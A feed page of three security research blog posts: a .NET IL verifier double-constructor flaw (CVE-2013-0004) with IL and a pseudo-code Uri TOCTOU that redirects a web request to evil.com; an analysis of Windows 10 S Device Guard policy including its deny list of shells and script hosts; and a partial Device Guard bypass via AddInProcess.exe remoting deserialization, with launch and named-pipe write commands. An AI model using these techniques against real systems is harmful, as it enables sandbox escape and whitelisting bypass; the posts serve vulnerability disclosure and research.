Quantcast
Channel: Tyranid's Lair
Viewing all 81 articles
Browse latest View live

Old .NET Vulnerability #4: Double Construction Verification Issue (CVE-2013-0004)

$
0
0
This blog post is a continuation in my series of old .NET vulnerabilities. It's been a while since I didn't #2 and #3. It concerns a bug in the IL verifier which allows an object's constructor to be called twice leading the TOCTOU attacks and other weird behaviours from Partial Trust (PT) sandboxed code. It was fixed in MS13-004 as CVE-2014-0004.

IL Verification and Partial Trust

If you've ever dealt with partial trust .NET applications you might know about the IL verifier. Even though .NET is effectively type safe it's possible to write bad IL code (for example code which calls a method on the wrong type of object). The framework has a verifier which will scan the IL of the method it's going to JIT and ensure that it meets a number of requirements so that type safety can be enforced. This has a performance impact so MS decided only to apply it when emitting code for a PT assembly. If you're running in full trust then you can just invoke unsafe code or call through P/INVOKE so doing additional verification doesn't seem worth the effort.

From a EoP perspective testing the boundaries of the IL verifier is important, if you can sneak something past the verifier you might be able to create unsafe code which can be exploited to break out the PT sandbox. For whatever reason one day I decided to look at the handling of object constructors. Even though constructors are pretty much like methods (except they're marked with the special name .ctor), they have special rules as stated in ECMA-335 :
  • CLS Rule 21: An object constructor shall call some instance constructor of its base class before any access occurs to inherited instance data. (This does not apply to value types, which need not have constructors.)
  • CLS Rule 22: An object constructor shall not be called except as part of the creation of an object, and an object shall not be initialized twice.
Of course these are Common Language Specification rules which just ensures interoperability, it doesn't necessarily translate into a list of rules for the verifier. But you'd kind of assume it would match up. However looking further in §1.8.1.4 we find the following when referring to the verification of "Class and object initialization rules":

"An object constructor shall not return unless a constructor for the base class or a different construct for the object’s class has been called on the newly constructed object. The verification algorithm shall treat the this pointer as uninitialized unless the base class constructor has been called. No operations can be performed on an uninitialized this except for storing into and loading from the object’s fields."

This snippet doesn't mention anything about double initialization. Perhaps there's a bug here, let's test this out.

Testing the Double Construction Verification Error

C# doesn't allow us to easily create malformed IL code. We could use the System.Reflection.Emit classes to generate the malformed IL code on the fly, but I find it quicker to use the IL assembler which ships with the .NET framework.

Let's first create two classes in C# and compile it to an assembly using Visual Studio or the command line CSC compiler:

usingSystem;classA{privateint_x;protectedA(intx){_x=x;}publicoverridestringToString(){returnString.Format("x={0}",_x);}}classB:A{publicB():base(1234){Console.WriteLine(this);}}classMainClass{staticvoidMain(){newB();}}

We have two classes A and B. B is derived from A and calls the base constructor passing the value 1234. We then write the this object to the console, which calls ToString. Running this on its own results in writing x=1234 to the console. So far no surprises. Now let's disassemble the assembly code, I'd recommend the ILDasm tool which comes with the .NET SDK for this as it generates IL code which is easily assembled again. Run the command "ildasm /OUT=output.il program.exe" replacing "program.exe" with the name of the compiled C# program. We can now pick out the IL code for the B class as shown:

.class private auto ansi beforefieldinit B
       extends A
{
  .method public hidebysig specialname rtspecialname 
          instance void  .ctor() cil managed
  {
    // Code size       18 (0x12)
    .maxstack  8
    IL_0000:  ldarg.0
    IL_0001:  ldc.i4     0x4d2
    IL_0006:  call       instance void A::.ctor(int32)
    IL_000b:  ldarg.0
    IL_000c:  call       void [mscorlib]System.Console::WriteLine(object)
    IL_0011:  ret
  } // end of method B::.ctor

} // end of class B


The call to the base constructor is the first three instructions. First the this pointer is pushed onto the evaluation stack with the ldarg.0 instruction. The ldarg instruction pushes the numbered argument to the current function onto the stack, and like in C++ the this argument is a hidden first argument to the function. We then push the constant 0x4D2, or 1234 on to the evaluation stack and then call the instance method constructor for A which takes a single 32 bit integer. Let's see what happens if we just don't call the base constructor. For that remove the first 3 instructions of the constructor, either delete or just comment them out. Now run the IL assembler to recreate the program using the command "ilasm.exe /OUTPUT=program_no_base_call.exe output.il". Run the created executable  and be prepared to be shocked when nothing really happens, other than instead of printing "x=1234" we get "x=0". Ultimately the run time is still mostly type safe, sure you've not called the base constructor but the normal object creation routines did ensure that the _x field was initialized to 0.

As nothing happened, perhaps this will work in PT. First things first let's run the verifier on the assembly to see what the CLR thinks about the missing call to the base constructor. The SDK comes with a tool PEVerify which will verify the assembly passed to it and report and verification failures.

C:\> peverify program_no_base.exe

Microsoft (R) .NET Framework PE Verifier.  Version  4.0.30319.0
Copyright (c) Microsoft Corporation.  All rights reserved.

[IL]: Error: [program_no_base.exe : B::.ctor][offset 0x00000001][found ref ('this' ptr) 'B'][expected ref 'System.Object'] Unexpected type on the stack.
[IL]: Error: [program_no_base.exe : B::.ctor][offset 0x00000006] Return from .ctor when this is uninitialized.
2 Error(s) Verifying program_no_base.exe

The verifier actually reports two errors, the first error is reported after pushing the this pointer on the stack to pass to System.Console.WriteLine. This error represents the check to ensure that the this pointer isn't used unitialized. The verifier maintains a state for the this pointer, initially it's but after the this pointer is passed to a constructor the type changes to the appropriate type for the class. The second error checks any constructor is called prior to returning from the constructor. But does it fail if we run it in PT? To test that we can run this code in an XBAP or a restricted ClickOnce application. I just have a simple test harness which runs the code inside a limited sandbox. If you execute the code as PT you immediately see the following exception:

Unhandled Exception: System.Security.VerificationException: Operation could destabilize the runtime.
   at B..ctor()
   at MainClass.Main()

VerificationException is where dreams of sandbox escapes go to die. At least the verifier is consistent, and there's a good reason for that. The verifier used in PEVerify is not an isolated copy of the verification rules used in the framework. The tool accesses a COM interface from the runtime (ICLRValidator if you're interested), so what PEVerify outputs as errors should match what the runtime actually uses. What about double initialization? Replace the construction function in B with the following and reassemble again:

  .method public hidebysig specialname rtspecialname 
          instance void  .ctor() cil managed
  {
    .maxstack  8
    ldarg.0
    ldc.i4     0x4d2
    call       instance void A::.ctor(int32)
    ldarg.0
    call       void [mscorlib]System.Console::WriteLine(object)
    ldarg.0
    ldc.i4     42
    call       instance void A::.ctor(int32)
    ldarg.0
    call       void [mscorlib]System.Console::WriteLine(object)
    ret
  } // end of method B::.ctor

This replacement constructor just repeats the call to the constructor and the call to WriteLine but replaces the number with 42 when initializing the internal field the second time. Running this with full trust will print "x=1234" following by "x=42" as you might expect. However, running this in PT mode, gives the same result as long you're running an old version of .NET 2 or 4 prior to the MS13-004 patch. Running PEVerify shows what we suspect, the double construction isn't detected:

Microsoft (R) .NET Framework PE Verifier.  Version  4.0.30319.0
Copyright (c) Microsoft Corporation.  All rights reserved.

All Classes and Methods in program_double_con.exe Verified.

The patch for MS13-004 just added a verification rule to detect this condition. If you now run PEVerify on the binary with an up to date version of .NET you'll see the following verification error.

[IL]: Error: [program_double_con.exe : B::.ctor][offset 0x00000017] Init state for this differs depending on path.
1 Error(s) Verifying program_double_con.exe

As I mentioned, as PEVerify uses the runtime's verifier we didn't need to update the tool, just the runtime to detect the new error. To wrap-up let's see an example of a use case for this issue to elevate privileges.

Example Use Case

One of the simplest ways of abusing this feature is performing a TOCTOU attack on system class library code which assumes an object's immutable as you can't construct it twice. A good example of a class which implements this pattern is the System.Uri class. The Uri class has no methods to change the contents outside of the constructor, so it's effectively immutable. However, with the ability to call a constructor twice we can change the target the class represents, without changing the object reference. This means if we can get some system code to first check the Uri object is safe, and then stores the verified Uri object reference to use later we can change the target and circumvent a security check.

A perfect example of this is the System.Net.WebRequest class. The class has a Create method which takes a Uri object. If we pass a HTTP URI we end up in the HttpWebRequest internal class constructor which has the following code (heavily edited to remove unnecessary initialization):

internalHttpWebRequest(Uriuri){newWebPermission(NetworkAccess.Connect,uri).Demand();this._Uri=uri;// Just initialize the rest. }

The code first demands that the caller has NetworkAccess.Connect permission to the target URI. If that succeeds then it stores the Uri object for later use. The created HttpWebRequest object never checks the Uri again and it's used directly when we eventually call the GetResponse method. 

For this to work you at least need a WebPermission grant in the PT sandbox you're trying to exploit. Fortunately if you deployed this through an XBAP you'd be granted permission to communicate back to the source web site, and in this time you could even load the XBAP without a prompt (what a world). So assuming you deploy the application from http://www.safe.com and you want to communicate with http://www.evil.com then the following pseudo C# will do that for you:

classMyUri:Uri{publicMyUri(){base("http://www.safe.com");// Create web request while we're safe. WebRequestrequest=WebRequest.Create(this);base("http://www.evil.com");// Use request to talk to http://evil.com }}

We construct a derived Uri class (even though Uri is immutable it can still be derived from). Then in the constructor we call the base constructor with the safe URI we've got permission to communicate to. At this point the this pointer is valid according to the verifier. We can now pass the this pointer to the WebRequest creation call, it'll do the check but it's allowed. Finally we recall the constructor to change the underlying URI to the different location. If we get the response from the WebRequest we'll communicate with http://www.evil.com instead.

You still need to convert this into an actually implementation, you can't compiled it from that pseudo C#. But I'll leave that as an exercise for the reader.

Device Guard on Windows 10 S

$
0
0
This blog is about Device Guard (DG) on Windows 10 S (Win10S). I’ll go through extracting the policy and finding out what you can and cannot run on a default Win10S system. Perhaps in a future blog post, I’ll describe some ways of getting arbitrary code execution without installing any additional software such as Office or upgrading to Windows 10 Pro.

Win10S is the first Windows operating system released to consumers which comes pre-locked down with DG. DG builds upon Kernel Mode Code Integrity (KMCI) introduced in Windows Vista and User Mode Code Integrity (UMCI) which was introduced in Windows 8 RT. It contains many features to restrict code execution by limiting what types of executable files/scripts, including DLLs can be loaded based on a set of policy rules. A good first step towards trying to find ways to run arbitrary code on a system with DG is to extract the DG policy and inspect it for weaknesses.

Before we start, I'd like to thank Matt Graeber for reviewing this post before it went out. His DG knowledge is far better than anyone I know.

Extracting the DG System Integrity Policy

The enforcement of DG is configured through a System Integrity (SI) policy. The SI policy is stored as a binary file on disk. When the operating system boots either WINLOAD or the kernel CI driver loads the policy into memory and begins enforcement based on the various rules configured.

The location of the file varies depending on how the policy was deployed. On the Surface Laptop I have, which comes with Win10S pre-installed the policy is located inside the C:\Windows\Boot\EFI folder with the name winsipolicy.p7b. There’s no restrictions on reading this file to extract its contents to determine what policy is enforced. Unfortunately, there’s no official documentation I know of which describes the binary policy file format. There is the ConfigCI Powershell module which will convert an XML file to a binary policy. Unfortunately, there’s no corresponding command to perform the reverse.

Fortunately, the ever amazing Matt Graeber put in the effort and wrote a Powershell script which can convert the binary format back to the XML format. Unfortunately, there was some issues with the original script, such as missing some new additions to the format that Microsoft have added as well as a couple of bugs. Therefore, I’ve tweaked the original to fully support the policy format used on Win10S as well as fixing some bugs. Matt updated his copy on github with my fixes, you can get it from here. Load the script into Powershell then run the following command:

ConvertTo-CIPolicy winsipolicy.p7b output.xml

The result of the conversion is an XML file we can read. As with the binary file, the XML file is poorly documented, the best resource is almost certainly Matt Graeber’s blog, specific this post. Let’s break it down into small sections.

System Integrity Policy Rules

The first important section are the Rules which define a set of boolean options to enable in the System Integrity policy.

<Rules>
 <Rule>
   <Option>Enabled:UMCI</Option>
 </Rule>
 <Rule>
   <Option>Enabled:Advanced Boot Options Menu</Option>
 </Rule>
 <Rule>
   <Option>Required:Enforce Store Applications</Option>
 </Rule>
 <Rule>
   <Option>Enabled:Conditional Windows Lockdown Policy</Option>
 </Rule>
</Rules>

The first option enables UMCI. By default, DG doesn’t enforce UMCI, although it does enforce KMCI. The second option enables the Advanced Boot Options Menu, this is interesting as by default the menu would be disabled and this policy allows the user of the system to have more control over the boot process. This configuration will become important in a later blog post. The third option Enforces Store Applications. This ensures you can’t disable UMCI for store applications. Without this setting, it’d be possible to configure a side-loading policy to allow you deploy your own UWP applications. As the purpose of Win10S is “security,” they only allow UWP applications which are store signed, I’ll explain what that means in the section on allowed signers. Finally, Conditional Windows Lockdown Policy seems to be related to the Windows 10 S SKU and the potential that the lockdown policy can ultimately be disabled. This is related to the license values and a system environment variable “Kernel_CI_SKU_UNLOCKED”. This probably needs further investigation.

File Rules

Next up are the set of file rules. These are usually used to blacklist specific executable files which are known DG bypasses and would allow you to trivially run arbitrary code. This is close to the same list provided by Microsoft in their DG deployment guide here. However, they also block things like registry editing tools and Windows Scripting Host.

<FileRules>
 <DenyFileName="bash.exe"MinimumFileVersion="65535.65535.65535.65535"/>
 <DenyFileName="CDB.Exe"MinimumFileVersion="..."/>
 <DenyFileName="cmd.Exe"MinimumFileVersion="..."/>
 <DenyFileName="cscript.exe"MinimumFileVersion="..."/>
 <DenyFileName="csi.Exe"MinimumFileVersion="..."/>
 <DenyFileName="dnx.Exe"MinimumFileVersion="..."/>
 <DenyFileName="fsi.exe"MinimumFileVersion="..."/>
 <DenyFileName="kd.Exe"MinimumFileVersion="..."/>
 <DenyFileName="MSBuild.Exe"MinimumFileVersion="..."/>
 <DenyFileName="mshta.exe"MinimumFileVersion="..."/>
 <DenyFileName="ntsd.Exe"MinimumFileVersion="..."/>
 <DenyFileName="powershell.exe"MinimumFileVersion="..."/>
 <DenyFileName="powershell_ise.exe"MinimumFileVersion="..."/>
 <DenyFileName="rcsi.Exe"MinimumFileVersion="..."/>
 <DenyFileName="reg.exe"MinimumFileVersion="..."/>
 <DenyFileName="regedit.exe"MinimumFileVersion="..."/>
 <DenyFileName="regedt32.exe"MinimumFileVersion="..."/>
 <DenyFileName="wbemtest.exe"MinimumFileVersion="..."/>
 <DenyFileName="windbg.Exe"MinimumFileVersion="..."/>
 <DenyFileName="wmic.exe"MinimumFileVersion="..."/>
 <DenyFileName="wscript.exe"MinimumFileVersion="..."/>
</FileRules>

For each deny rule, the policy specifies a filename and a minimum file version. Note that the minimum version is really the maximum when it comes to a deny rule. In the sense that the rule only applies to files with a version number less than that specified. As every rule has the version set to 65535.65535.65535.65535 which is the absolute maximum it ensures that no version of these executables can ever execute. The filename and version are extracted from the executable’s version resources, this means you can’t just rename cmd.exe to badger.exe, the policy will see the Original Filename inside the version resource and block execution. If you try and modify the version resource then the file’s signature no longer matches and you won’t pass the signing policy.

It’s not really clear why Microsoft went all out and blocked things like CMD other than to annoy users. Sure, you could use it to run commands but you’re still somewhat limited by what executables you can run based on the signing policy. PowerShell and WScript I can perhaps more understand, but as we’ll see later, these file policy rules only serve as a speed bump to prevent us getting arbitrary code execution.

Allowed Signers

Now we get on to what signers the DG policy will allow (assuming of course they’re not blocked by the file rules). First, the DG policy defines the list of allowed signers, this list is then referred to later in the policy configuration. The list of allowed signers is as follows:
<SignerName="MincryptKnownRootMicrosoftTestRoot2010"ID="ID_SIGNER_TEST2010">
 <CertRootType="Wellknown"Value="0A"/>
</Signer>
<SignerName="MincryptKnownRootMicrosoftDMDRoot2005"ID="ID_SIGNER_DRM">
 <CertRootType="Wellknown"Value="0C"/>
</Signer>
<SignerName="MincryptKnownRootMicrosoftProductRoot2010"ID="ID_SIGNER_DCODEGEN">
 <CertRootType="Wellknown"Value="06"/>
 <CertEKUID="ID_EKU_DCODEGEN"/>
</Signer>
<SignerName="MincryptKnownRootMicrosoftStandardRoot2011"ID="ID_SIGNER_AM">
 <CertRootType="Wellknown"Value="07"/>
 <CertEKUID="ID_EKU_AM"/>
</Signer>
<SignerName="Microsoft Product Root 2010 Windows EKU"ID="ID_SIGNER_WINDOWS_PRODUCTION_USER">
 <CertRootType="Wellknown"Value="06"/>
 <CertEKUID="ID_EKU_WINDOWS"/>
</Signer>
<SignerName="Microsoft Product Root 2011 Windows EKU"ID="ID_SIGNER_WINDOWS_PRODUCTION_USER_2011">
 <CertRootType="TBS"Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
 <CertEKUID="ID_EKU_WINDOWS"/>
</Signer>
<SignerName="Microsoft Product Root 2010 ELAM EKU"ID="ID_SIGNER_ELAM_PRODUCTION_USER">
 <CertRootType="Wellknown"Value="06"/>
 <CertEKUID="ID_EKU_ELAM"/>
</Signer>
<SignerName="Microsoft Product Root 2010 HAL EKU"ID="ID_SIGNER_HAL_PRODUCTION_USER">
 <CertRootType="Wellknown"Value="06"/>
 <CertEKUID="ID_EKU_HAL_EXT"/>
</Signer>
<SignerName="Microsoft Product Root 2010 WHQL EKU"ID="ID_SIGNER_WHQL_SHA2_USER">
 <CertRootType="Wellknown"Value="06"/>
 <CertEKUID="ID_EKU_WHQL"/>
</Signer>
<SignerName="Microsoft Product Root WHQL EKU SHA1"ID="ID_SIGNER_WHQL_SHA1">
 <CertRootType="Wellknown"Value="05"/>
 <CertEKUID="ID_EKU_WHQL"/>
</Signer>
<SignerName="Microsoft Product Root WHQL EKU MD5"ID="ID_SIGNER_WHQL_MD5">
 <CertRootType="Wellknown"Value="04"/>
 <CertEKUID="ID_EKU_WHQL"/>
</Signer>
<SignerName="Microsoft Flighting Root 2014 Windows EKU"ID="ID_SIGNER_WINDOWS_FLIGHT_ROOT">
 <CertRootType="Wellknown"Value="0E"/>
 <CertEKUID="ID_EKU_WINDOWS"/>
</Signer>
<SignerName="Microsoft Flighting Root 2014 ELAM EKU"ID="ID_SIGNER_ELAM_FLIGHT">
 <CertRootType="Wellknown"Value="0E"/>
 <CertEKUID="ID_EKU_ELAM"/>
</Signer>
<SignerName="Microsoft Flighting Root 2014 HAL EKU"ID="ID_SIGNER_HAL_FLIGHT">
 <CertRootType="Wellknown"Value="0E"/>
 <CertEKUID="ID_EKU_HAL_EXT"/>
</Signer>
<SignerName="Microsoft Flighting Root 2014 WHQL EKU"ID="ID_SIGNER_WHQL_FLIGHT_SHA2">
 <CertRootType="Wellknown"Value="0E"/>
 <CertEKUID="ID_EKU_WHQL"/>
</Signer>
<SignerName="Microsoft MarketPlace PCA 2011"ID="ID_SIGNER_STORE">
 <CertRootType="TBS"Value="FC9EDE3DCCA09186B2D3BF9B738A2050CB1A554DA2DCADB55F3F72EE17721378"/>
 <CertEKUID="ID_EKU_STORE"/>
</Signer>
<SignerName="Microsoft Product Root 2010 RT EKU"ID="ID_SIGNER_RT_PRODUCTION">
 <CertRootType="Wellknown"Value="06"/>
 <CertEKUID="ID_EKU_RT_EXT"/>
</Signer>
<SignerName="Microsoft Flighting Root 2014 RT EKU"ID="ID_SIGNER_RT_FLIGHT">
 <CertRootType="Wellknown"Value="0E"/>
 <CertEKUID="ID_EKU_RT_EXT"/>
</Signer>
<SignerName="Microsoft Standard Root 2001 RT EUK"ID="ID_SIGNER_RT_STANDARD">
 <CertRootType="Wellknown"Value="07"/>
 <CertEKUID="ID_EKU_RT_EXT"/>
</Signer>

The majority of the signing certificates use a special “Wellknown” format with just a single numeric value which identifies the certificate. Finding out what certificates these correspond to can be tricky, again poor documentation. Fortunately, the Powershell ConfigCI module on Win10S has example policy files such as Default_WindowsEnforced.xml which at least gives them names if not spelling out the explicit certificate used (they could be multiple Microsoft Product Root 2010 certificates after all). It’s likely for example that “Microsoft Product Root 2010” is the following root which is the root certificate of pretty much all the signed files on Win10S:

root_2010.PNG

However, it’s not enough to be signed by whitelisted signer that’d be too easy. You must also have in the certificate chain a specific Enhanced Key Usage (EKU). So for example signer ID_SIGNER_WINDOWS_PRODUCTION_USER must have the EKU ID_EKU_WINDOWS which has the OID value 1.3.6.1.4.1.311.10.3.6. The Windows binaries have this EKU set, but something which is also Microsoft signed such as WinDBG is signed by the same root but doesn’t have this EKU set meaning it doesn’t load. From this information we can understand what it means to be store signed. It’s a combination of a specific certificate chain and a specific Store EKU. This is reflected in the ID_SIGNER_STORE signing rule.

cert_ekus.png

For kernel code, the following signers are allowed:

<AllowedSignerSignerId="ID_SIGNER_WINDOWS_PRODUCTION_USER"/>
<AllowedSignerSignerId="ID_SIGNER_ELAM_PRODUCTION_USER"/>
<AllowedSignerSignerId="ID_SIGNER_HAL_PRODUCTION_USER"/>
<AllowedSignerSignerId="ID_SIGNER_WHQL_SHA2_USER"/>
<AllowedSignerSignerId="ID_SIGNER_WHQL_SHA1"/>
<AllowedSignerSignerId="ID_SIGNER_WHQL_MD5"/>
<AllowedSignerSignerId="ID_SIGNER_WINDOWS_FLIGHT_ROOT"/>
<AllowedSignerSignerId="ID_SIGNER_ELAM_FLIGHT"/>
<AllowedSignerSignerId="ID_SIGNER_HAL_FLIGHT"/>
<AllowedSignerSignerId="ID_SIGNER_WHQL_FLIGHT_SHA2"/>
<AllowedSignerSignerId="ID_SIGNER_TEST2010"/>

For user mode, the following are allowed:

<AllowedSignerSignerId="ID_SIGNER_WINDOWS_PRODUCTION_USER"/>
<AllowedSignerSignerId="ID_SIGNER_ELAM_PRODUCTION_USER"/>
<AllowedSignerSignerId="ID_SIGNER_HAL_PRODUCTION_USER"/>
<AllowedSignerSignerId="ID_SIGNER_WHQL_SHA2_USER"/>
<AllowedSignerSignerId="ID_SIGNER_WHQL_SHA1"/>
<AllowedSignerSignerId="ID_SIGNER_WHQL_MD5"/>
<AllowedSignerSignerId="ID_SIGNER_WINDOWS_FLIGHT_ROOT"/>
<AllowedSignerSignerId="ID_SIGNER_ELAM_FLIGHT"/>
<AllowedSignerSignerId="ID_SIGNER_HAL_FLIGHT"/>
<AllowedSignerSignerId="ID_SIGNER_WHQL_FLIGHT_SHA2"/>
<AllowedSignerSignerId="ID_SIGNER_STORE"/>
<AllowedSignerSignerId="ID_SIGNER_RT_PRODUCTION"/>
<AllowedSignerSignerId="ID_SIGNER_DRM"/>
<AllowedSignerSignerId="ID_SIGNER_DCODEGEN"/>
<AllowedSignerSignerId="ID_SIGNER_AM"/>
<AllowedSignerSignerId="ID_SIGNER_RT_FLIGHT"/>
<AllowedSignerSignerId="ID_SIGNER_RT_STANDARD"/>
<AllowedSignerSignerId="ID_SIGNER_TEST2010"/>

The only thing which stands out here is the user mode signing for ID_SIGNER_DRM which is because it’s a pre-trusted root key for DRM. And as I’ve blogged about before, it’s almost certainly possible to get a private key for a certificate which chains to this root from many graphics drivers (see my blog post here). I’ve not tested it but while you could chain to this root by grabbing the private key from the kernel driver (assuming it’s in software), the chain you could build probably isn’t suitable for code signing anyway. But again it’s something worth looking at.

The final use for signers is specifying who’s allowed to sign and update the policy. In order for a policy to be used unsigned there must be the “Enabled:Unsigned System Integrity Policy” set, however as we saw earlier in this blog that wasn’t the case. You can see which signer is allowed to sign the policy in the following snippet.

<UpdatePolicySigners>
<UpdatePolicySignerSignerId="ID_SIGNER_WINDOWS_PRODUCTION_USER_2011"/>
</UpdatePolicySigners>

This policy is using ID_SIGNER_WINDOWS_PRODUCTION_USER_2011 which if you look back at the signers is a To-Be-Signed certificate rather than a well known one. So we’d need to find the actual certificate which matches this hash value. However we can guess, it’s almost certainly just one of the roots for signing the existing winsipolicy.p7b file. We can use the Get-CIBinaryPolicyCertificate cmdlet from Matt’s script to dump the certificates and then use the ConfigCI Powershell module to generate the TBS value. Which we can see matches up with the TBS value from before:

update_signer.PNG

Conclusions

Overall, from a basic DG policy perspective, Win10S seems reasonable. Effectively, only Microsoft signed code can run and then only ones with either WHQL or Windows EKUs in the certificates which would make it tricky to the find anything useful outside of what’s installed with the operating system to exploit. Of course with Desktop Bridge applications, which are effectively store signed Win32 applications and the general quality of Windows driver developers no doubt there’s some additional code which can be exploited by installing it onto the system. You just have to look at Office, which is allowed to be installed from the Store which has its VBA macro functionality intact.

What is missing though is any use of Hyper-V based enforcement, either to restrict removing the policy or ensure kernel mode integrity through HyperGuard or HVCI code integrity enforcement. This is a severe weakness, it’s not like Win10S doesn’t support Hyper-V, you can even install the full Hyper-V and configuration tools. This allows you to run a normal version on Windows in a VM on top of the locked down platform which is actually kind of nice. But it means that the System Integrity policy is not very well protected. This is something which we’ll come back to at a later date in a future blog post.

DG on Windows 10 S: Executing Arbitrary Code

$
0
0
From my previous blog post you might assume that getting non-Microsoft code to run on Windows 10 S would be difficult. Of course it’s already been noted that all you need to do is install Office and you can access the full scripting capability of VBA Macros as long as the file does not have MOTW. The fact is that the basic limitation of loading arbitrary executables and DLLs is the only thing being enforced by the Windows kernel. There’s nothing stopping existing, signed applications, such as Office from creating their own executable content which can be abused by the user or indeed an attacker.


You might therefore also assume that it’ll be trivial to get some arbitrary code running as there’s a number of different scripting engines on a default installation on Windows? Not so fast, many of the in-built script engines such as Powershell and Windows Scripting Host (WSH), which runs JScript/VBScript, are “Enlightened”. This means when they detect that UMCI is enabled, they’ll go into a locked down mode, such as PowerShell’s Constrained Language Mode. If the script being executed is also signed by the same sets of certificates as binary executable content, these enlightened hosts will unlock the full functionality of the scripting language. Typically, there’s ways to bypass these restrictions, in fact I did just that for Windows RT. You can see an entire presentation about the bypasses from BlueHat (when I was still invited to these things).


But this is somewhat academic when it comes with Win10S. The main enablers for bypasses, Scripting Engines, have their primary host executables blacklisted in the DG policy I showed last time. A few other well known offenders such as MSBuild are also blacklisted. So I guess we’ll have to go back to square one? Well not so much, there’s still a lot of executables on a default Win10S system which can be abused, we just need to find them.


DISCLAIMER: I’ve not sent the DG/UMCI bypass I’m about to describe to MSRC. The reason for not doing so is it’s not a click and run bypass. The only group which is likely to find the bypass useful are (as Matt and Casey would put it) Enlightened attackers. Attackers which know about how your systems are secured. This could be an external attacker, but it could also be your own users. DO NOT consider any application whitelisting solution to be secure against a bored member of staff.

Give my Regards to BinaryFormatter

Object serialization frameworks are a rich source of trivial arbitraryexecutionbugs, and .NET clearly didn’t want to be left out. Not that long ago, I found an RCE in .NET relating to the handling of WMI classes. You can read more details in the blog post, but to cut a long story short it allowed me to pass an arbitrary byte stream to the in-built BinaryFormatter class and get it to load an Assembly from memory and execute arbitrary code.


What was less obvious was that this was also a DG bypass. PowerShell allows you in Constrained Language Mode to query arbitrary WMI servers and classes, however the .NET runtime isn’t enlightened so it will happily load an Assembly from a byte array. Loading from a byte array is important as normally .NET will load Assemblies from an executable file which needs to be mapped into memory. The act of mapping the executable into memory triggers the CI module in the kernel to verify the signature, which for arbitrary code isn’t going to be permitted to load due to the configure CI policy. From a byte array, the kernel never sees the Assembly as .NET, will process it and execute arbitrary managed code from it. The DCOM bug has now been fixed, and at any rate PowerShell is blocked so we couldn’t invoke the WMI methods. However, if we could find another application which will take an array of bytes and pass it to BinaryFormatter we could reuse the deserialization exploit chain used in my previous exploit and use it to get a DG bypass in memory.


I concentrated my efforts on just the executables inside the %SystemRoot%\Microsoft.Net directories as many of them are written in .NET and so stand a reasonable chance of being exploitable. The first one to catch my eye, more than anything from a purely alphabetic point-of-view was AddInProcess.exe. This executable is known to me, in fact I’ve looked at it before from the perspective of Partial Trust sandbox escapes (maybe I’ll blog about that at some point in the future).


The process is used as part of the Add-In model which was introduced in .NET 4. The Add-In model provides a structured framework to expose functionality to 3rd parties to add additional features to an existing application. A plugin framework if you will. Actually implementing this requires you to develop contract interfaces and build pipelines and many other complicated things, but we don’t really care about all that. The thing which is interesting is the model supports Out-of-Process (OOP) Add-Ins, and this is the purpose of the AddInProcess. The executable is started in order to act as a host for these OOP Add-Ins. The Main function of the executable is pretty simple, the following is it in almost its entirety:


staticint Main(string[] args){
    if(args.Length !=2
||!args[0].StartsWith("/guid:")
    ||!args[1].StartsWith("/pid:")){
       return1;
   }
   
   string guid = args[0].Substring(6);
   int pid =int.Parse(args[1].Substring(5));
   AddInServer server =new AddInServer();
   var server =new BinaryServerFormatterSinkProvider {
       TypeFilterLevel = TypeFilterLevel.Full
   };
   var client =new BinaryClientFormatterSinkProvider();
   var props =new Hashtable();
   props["name"]="ServerChannel";
   props["portName"]= guid;
   props["typeFilterLevel"]="Full";
   var chnl =new AddInIpcChannel(props, client, server);
   ChannelServices.RegisterChannel(chnl,false);
   RemotingServices.Marshal(server,"AddInServer");
   Process.GetProcessById(pid).WaitForExit();
   return0;
}


The interesting thing to point out here is the use of ChannelServices.RegisterChannel. This indicates that it’s using .NET remoting to perform communication. Where have we seen .NET remoting before? Oh that’s right, when I last broke .NET remoting. The main point about all this is that not only is it using .NET remoting which is basically broken, they’re using it with BinaryFormatter in Full TypeFilterLevel mode which means we can deserialize any data we like without worrying about the few security restrictions imposed such as running everything inside a PermitOnly grant for SerializationFormatter permission.


The process is creating an IPC channel, which uses Windows Named Pipes. The name of the pipe is specified using the portName property which is being passed on the command line. The process also takes a process ID which it waits for until the other process exits. Therefore we can start the AddInProcess with the following command line:


AddInProcess.exe /guid:32a91b0f-30cd-4c75-be79-ccbd6345de11 /pid:XXXX


Replace XXXX with a process ID which we know will stick around, such as Explorer. We'll find that the process creates the named pipe \\.\pipe\32a91b0f-30cd-4c75-be79-ccbd6345de11. The name of the service is configured using RemotingServices.Marshal which in this case is AddInServer. Therefore we can build the remoting URI as ipc://32a91b0f-30cd-4c75-be79-ccbd6345de11/AppInServer and we can use my ExploitRemotingService tool to verify it's exploitable (on a non-DG Windows 10 machine of course).


exploit_ipc_channel.PNG


We need to use the --useser flag with the ExploitRemotingService tool in order to not use the old exploits which MS fixed. The useser flag sends serialized objects and gets them back from the server which allows you to do file operations such as listing directories and uploading/downloading files. This only works if the TypeFilterLevel is set to Full. This proves that the remoting channel will be vulnerable to arbitrary deserialization. We can just replace the serialized bytes from my tool with the one from my .NET DCOM exploit and we should get code arbitrary code execution in the context of the AddInProcess.


Now at this point we have an issue, if the only way to send data to this IPC server is by running a tool specially designed to communicate with a .NET remoting service then we can already run arbitrary code and don’t need a bypass. As the channel is a named pipe perhaps we can exploit it remotely? No such luck, the .NET Framework creates the named pipe with an explicit security descriptor which blocks network access.


namedpipe_security.PNG


In theory, we could change the permissions but even if we found a tool to do it needing a second machine is a pain. So what to do? Fortunately for us the .NET remoting protocol is pretty simple, at least when not used in a secure mode (which in this case it’s not). It’s a good example of a fire-and-forget protocol. No negotiation takes place at the start of the connection, the client just sends a correctly formatted set of bytes, including a header and the serialized Message to the server and if correct the server will respond. There’s no secrets which need to be worked out, we can create a binary file containing the serialized request ahead of time and just write it to the named pipe. If we massage the function which packages up the request from ExploitRemotingService and combine it the .NET serialization exploit from earlier we can generate a binary file which will exploit the .NET AddInProcess server.


If we have a file called request.bin the simplest way of writing this to the named pipe is to use CMD:


C:\> type request.bin > \\.\pipe\32a91b0f-30cd-4c75-be79-ccbd6345de11


